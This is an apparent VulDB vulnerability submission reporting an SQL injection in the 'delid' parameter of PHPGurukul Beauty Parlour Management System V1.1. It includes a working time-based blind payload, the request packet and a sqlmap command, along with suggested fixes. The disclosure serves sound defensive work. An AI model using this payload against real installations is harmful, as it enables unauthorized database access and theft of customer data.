Submit #665594: PHPGurukul Beauty Parlour Management System V1.1 SQL Injectioninfo

TitlePHPGurukul Beauty Parlour Management System V1.1 SQL Injection
Description## NAME OF AFFECTED PRODUCT(S) - Beauty Parlour Management System ## Vendor Homepage - https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ ## AFFECTED AND/OR FIXED VERSION(S) ### submitter - Li Hu - [email protected] - School of Cyberscience, University of Science and Technology of China ### Vulnerable File - /admin/customer-list.php ### VERSION(S) - V1.1 ### Software Link - https://phpgurukul.com/?sdm_process_download=1&download_id=10611 ## PROBLEM TYPE ### Vulnerability Type - SQL injection ### Root Cause - A SQL injection vulnerability was identified within the "/admin/customer-list.php" file of the "Beauty Parlour Management System" project. The root cause lies in the fact that attackers can inject malicious code via the parameter "delid". This input is then directly utilized in SQL queries without undergoing proper sanitization or validation processes. As a result, attackers are able to fabricate input values, manipulate SQL queries, and execute unauthorized operations. ### Impact - Exploiting this SQL injection vulnerability allows attackers to gain unauthorized access to the database, cause sensitive data leakage, tamper with data, gain complete control over the system, and even disrupt services. This poses a severe threat to both the security of the system and the continuity of business operations. ## DESCRIPTION - During the security assessment of "Beauty Parlour Management System", I detected a critical SQL injection vulnerability in the "/admin/customer-list.php" file. This vulnerability is attributed to the insufficient validation of user input for the "delid" parameter. This inadequacy enables attackers to inject malicious SQL queries. Consequently, attackers can access the database without proper authorization, modify or delete data, and obtain sensitive information. Immediate corrective actions are essential to safeguard system security and uphold data integrity. ## No login or authorization is required to exploit this vulnerability ## Vulnerability details and POC ### Vulnerability location: - "delid" parameter ### Payload: ```bash Parameter:delid(GET) Type: time-based blind Title: MySOL>=5.0.12 RLIKE time-based blind(query SLEEP) Payload: delid=10' RLIKE (SELECT 2249 FROM (SELECT(SLEEP(5)))pzgV)-- tkhW ``` ### Vulnerability Request Packet ```txt GET /1/bpms/admin/customer-list.php?delid=10 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=n11ldb2a9k2k7539qsd6c5usit Upgrade-Insecure-Requests: 1 Priority: u=0, i ``` ### The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash python sqlmap.py -r payload.txt --batch --level 3 ``` <img width="1255" height="583" alt="Image" src="https://github.com/user-attachments/assets/84afbd4b-170e-48ff-a8e7-c904ec43772a" /> ## Suggested repair 1. **Employ prepared statements and parameter binding:** Prepared statements serve as an effective safeguard against SQL injection as they segregate SQL code from user input data. When using prepared statements, user - entered values are treated as mere data and will not be misconstrued as SQL code. 2. **Conduct input validation and filtering:** Rigorously validate and filter user input data to guarantee that it conforms to the expected format. This helps in blocking malicious input. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has only the minimum required permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for day - to - day operations.
Source⚠️ https://github.com/f000x0/cve/issues/3
User
 Li Hu (UID 89284)
Submission09/30/2025 09:34 (7 months ago)
Moderation10/07/2025 12:54 (7 days later)
StatusAccepted
VulDB entry327351 [PHPGurukul Beauty Parlour Management System 1.1 /admin/customer-list.php delid sql injection]
Points20

PreviousOverviewNext

Might our Artificial Intelligence support you?

Check our Alexa App!